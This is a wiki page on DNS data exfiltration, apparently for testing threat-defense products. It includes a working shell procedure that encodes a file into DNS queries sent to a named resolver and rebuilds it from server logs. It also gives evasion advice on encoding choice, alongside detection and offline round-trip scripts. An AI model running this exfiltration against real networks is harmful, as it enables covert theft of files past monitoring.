dns:dns_exfiltration, revision 2023/11/29 15:02 (current) by bstafford, compared with the previous revision of 2023/05/27 19:18 by the same author.

===== DNS Exfiltration Demo =====
[[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]]

===== Base64 =====
Base64 output contains upper- and lower-case letters, digits, "+" and "/", and is padded with "=". The "+", "/" and "=" characters are not valid in hostnames, and mixed case is rare in legitimate query names, so Base64-encoded labels are easy to pick out in DNS logs: "normal" DNS traffic doesn't use them. Base64 is therefore not recommended for exfiltration. Use Base32 instead: its alphabet (A-Z, 2-7) consists entirely of valid hostname characters, and only the "=" padding on the final chunk is still conspicuous.

However, Base32 isn't available natively in many scripting toolsets, while Base64 is. So some attackers use Base64 anyway, to avoid having to write their own Base32 conversion code.
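The detection side of the point above, as an added example that is not part of the original page: the BIND query-log lines in SAMPLE_LOG are constructed (BIND 9.16-style field layout, with the page's ferrety-solutions.com domain) and the thresholds (a label of 40 or more characters, and "zone" meaning the last two labels) are assumptions. The three checks flag the Base64 name for its "+", "/" and "=", flag the final Base32 chunk for its "=" padding, and show how exfiltration stands out as a flood of unique names under a single zone.

```shell
#!/bin/sh
# Added example (not from the original page): spot exfiltration-shaped
# names in a BIND query log. The log lines below are constructed sample
# data, not a real capture.
SAMPLE_LOG='28-Nov-2023 10:00:01.100 client @0x7f3c2c1d2e30 10.0.0.5#50001 (www.example.com): query: www.example.com IN A +E(0) (192.0.2.53)
28-Nov-2023 10:00:01.200 client @0x7f3c2c1d2e30 10.0.0.5#50002 (1.ORSXG5BAMRQXIYI6NRTWI5DPN5XGK5DPOUQHSYZT7ZUYT5CQ4UN6C7FGEJVBXX.asdf.ferrety-solutions.com): query: 1.ORSXG5BAMRQXIYI6NRTWI5DPN5XGK5DPOUQHSYZT7ZUYT5CQ4UN6C7FGEJVBXX.asdf.ferrety-solutions.com IN A +E(0) (192.0.2.53)
28-Nov-2023 10:00:01.300 client @0x7f3c2c1d2e30 10.0.0.5#50003 (2.NBSWY3DPEB2GQZLSMU======.asdf.ferrety-solutions.com): query: 2.NBSWY3DPEB2GQZLSMU======.asdf.ferrety-solutions.com IN A +E(0) (192.0.2.53)
28-Nov-2023 10:00:01.400 client @0x7f3c2c1d2e30 10.0.0.5#50004 (3.aGVsbG8gd29ybGQ/Zm9v+YmFy=.asdf.ferrety-solutions.com): query: 3.aGVsbG8gd29ybGQ/Zm9v+YmFy=.asdf.ferrety-solutions.com IN A +E(0) (192.0.2.53)
28-Nov-2023 10:00:01.500 client @0x7f3c2c1d2e30 10.0.0.5#50005 (mail.example.com): query: mail.example.com IN A +E(0) (192.0.2.53)
28-Nov-2023 10:00:01.200 client @0x7f3c2c1d2e30 10.0.0.5#50002 (1.ORSXG5BAMRQXIYI6NRTWI5DPN5XGK5DPOUQHSYZT7ZUYT5CQ4UN6C7FGEJVBXX.asdf.ferrety-solutions.com): query: 1.ORSXG5BAMRQXIYI6NRTWI5DPN5XGK5DPOUQHSYZT7ZUYT5CQ4UN6C7FGEJVBXX.asdf.ferrety-solutions.com IN A +E(0) (192.0.2.53)'

# Pull the queried name out of each log line. It is the field after
# "query:", which is stable across BIND versions whose earlier fields differ.
query_names() {
    awk '{ for (i = 1; i < NF; i++) if ($i == "query:") print $(i+1) }'
}

# Unique names containing characters that are not valid in hostnames
# (letters, digits, hyphen, dot). Base64 "+", "/" and "=" land here, and so
# does the "=" padding on the last Base32 chunk.
count_non_hostname_names() {
    query_names | sort -u | awk '/[^A-Za-z0-9.-]/ { n++ } END { print n+0 }'
}

# Unique names with at least one label of 40+ characters (assumed threshold):
# Base32 payload labels are packed close to the 63-octet label limit.
count_long_label_names() {
    query_names | sort -u \
        | awk -F. '{ for (i = 1; i <= NF; i++) if (length($i) >= 40) { n++; break } }
                   END { print n+0 }'
}

# Unique names per zone (last two labels, an assumption). Exfiltration shows
# up as many never-repeated names under one zone; prints "count zone" for
# the busiest zone.
busiest_zone() {
    query_names | sort -u \
        | awk -F. 'NF >= 2 { c[$(NF-1) "." $NF]++ }
                   END { for (z in c) if (c[z] > best) { best = c[z]; bz = z }
                         print best, bz }'
}

printf '%s\n' "$SAMPLE_LOG" | busiest_zone
```

Run the checks over a real query log with `query_names < /var/log/named/query.log | ...` in place of the printf; the duplicated sixth sample line stands in for the repeated queries the page observes from BloxOne, and `sort -u` keeps them from inflating the counts.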
  
===== Simple Exfiltration =====
Note that the BIND query log will be approximately 17 times the size of the transferred file.

Note that this is really two scripts: the first part runs on the client that sends the queries, and the last few commands run on the authoritative DNS server to pull the encoded data out of its logs and decode it. (Base32 is encoding, not encryption; the variable names below keep the original "encrypted" wording.)
<code># File to be exfiltrated
SOURCE=/home/name/dns_exfil_test/file.pdf

# Client-side list of FQDNs to query
ENCRYPTED=/home/name/dns_exfil_test/encryptedpdf.txt
# Server-side copy of the received names, recovered from the query log
ENCRYPTED2=/home/name/dns_exfil_test/decryptedpdf.txt

# SLD of exfiltration domain
DOMAIN=ferrety-solutions.com

# Sub-domain off the SLD that we change for every file
SUBDOM=asdf

# Target DNS server (e.g. NIOS with DFP or BloxOne Host)
# Public IP is the BloxOne Threat Defense IP address
#LOCALDNS=192.168.11.154
LOCALDNS=52.119.41.100

# Log file that the DNS queries can be found in on the authoritative DNS server
BIND_LOG_FILE=/var/log/named/query.log

# File to put the decoded, received file into (should be a replica of SOURCE)
DECRYPTEDOUTPUT=/home/name/dns_exfil_test/file2.pdf

# Encode the source file as Base32,
# then split it into chunks of 62 characters (the maximum DNS label length is 63),
# then suffix each chunk with the domain to query,
# then prefix each line with its line number followed by "." (a sequence number on each query,
# so the server side can restore the order even when queries arrive out of order).
base32 $SOURCE | tr -d '\n' | fold -w 62 | sed -e "s/$/.$SUBDOM.$DOMAIN/" | nl -w1 -s. > $ENCRYPTED

# The result is a file that contains a huge list of FQDNs for us to query (exfiltrate).

# Exfiltrate the file with DIG.
dig +short A @$LOCALDNS -f $ENCRYPTED

# Delay between queries if required.
#for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i; sleep 0.1; done


## The following commands get run on the authoritative DNS server.
# Parse the DNS server log,
# then limit the scope to just the queries for the SUBDOM we set (ignore all the other random stuff
# we get, and any other exfiltration jobs running under the same domain),
# then extract just the queried FQDN (field 8 in this BIND query-log format; adjust the field
# number if your BIND version logs the line differently),
# then strip the "(" and "):" characters in case the field is the parenthesised form.
# Put the output into ENCRYPTED2 (the DNS server's copy of the encoded file).
grep "$SUBDOM.$DOMAIN" $BIND_LOG_FILE | awk '{print $8}' | sed 's/(//g; s/)://g' > $ENCRYPTED2

# Take the ENCRYPTED2 file,
# then strip off the ".SUBDOM.DOMAIN" suffix,
# then sort numerically on the sequence number (queries sometimes come in in the wrong order)
# and drop duplicate queries at the same time (BloxOne Threat Defense seems to duplicate stuff a bit),
# then drop the sequence number so only the Base32 chunk remains,
# then strip out the newlines so we just have one run of Base32,
# then convert the Base32 back to the original file.
sed "s/\.$SUBDOM\.$DOMAIN$//" $ENCRYPTED2 | sort -t. -k1,1n -u | cut -d. -f2 | tr -d '\n' | base32 --decode > $DECRYPTEDOUTPUT</code>
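The sequencing, sort and de-duplication logic of the procedure above, run as an offline round trip; this is an added example, not the page's script. It uses the same base32/fold/nl pipeline, but instead of sending the names through dig and recovering them from a BIND log it feeds them straight back with a duplicate, reversed order and lower-cased labels constructed to stand in for what the authoritative server sees (a resolver applying 0x20 case randomisation changes the case of query names in transit, which the page's script does not allow for). exfil.example and job1 are placeholder names.

```shell
#!/bin/sh
# Added example, not the page's script: encode -> simulated received names
# -> decode, entirely offline. exfil.example and job1 are placeholders.
DOMAIN=exfil.example   # assumed exfiltration SLD
SUBDOM=job1            # assumed per-file sub-domain

# One FQDN per line: <seq>.<up to 62 Base32 chars>.<SUBDOM>.<DOMAIN>
# 62 keeps the data label within the 63-octet DNS label limit.
encode_to_fqdns() {
    base32 "$1" | tr -d '\n' | fold -w 62 | nl -w1 -s. \
        | sed "s/\$/.$SUBDOM.$DOMAIN/"
}

# Stand-in for the names recovered from the authoritative server's query
# log (constructed): the first name duplicated, the order reversed and
# everything lower-cased, as a 0x20-randomising resolver might leave it.
simulate_received_names() {
    awk 'NR == 1 { dup = $0 } { l[NR] = $0 }
         END { print dup; for (i = NR; i > 0; i--) print l[i] }' \
        | tr 'A-Z' 'a-z'
}

# Reassemble the file from the received names:
#  - keep only <seq>.<chunk> (fields 1 and 2), which also drops the zone suffix
#  - normalise to the upper-case Base32 alphabet that base32 --decode expects
#  - sort numerically by sequence number, dropping duplicates with the same number
#  - drop the sequence number, join the chunks, decode
reassemble() {
    cut -d. -f1,2 | tr 'a-z' 'A-Z' | sort -t. -k1,1n -u \
        | cut -d. -f2 | tr -d '\n' | base32 --decode
}

# Round-trip a constructed sample file; returns 0 if the decoded copy is identical.
roundtrip_ok() {
    src=$(mktemp) ; dst=$(mktemp)
    { echo "constructed sample: not a real document"; seq 1 60; } > "$src"
    encode_to_fqdns "$src" | simulate_received_names | reassemble > "$dst"
    if cmp -s "$src" "$dst"; then rc=0; else rc=1; fi
    rm -f "$src" "$dst"
    return $rc
}

# Number of queries a file costs (one per line of the FQDN list).
query_count() {
    encode_to_fqdns "$1" | awk 'END { print NR }'
}

roundtrip_ok && echo "round trip OK: decoded file matches the source"
```

To use the pieces against a live setup, replace `simulate_received_names` with the grep/awk extraction from the query log shown above and pipe its output into `reassemble`; `query_count` is a quick way to estimate how many queries (and, at 62 characters of payload each, how much log volume) a given file will generate.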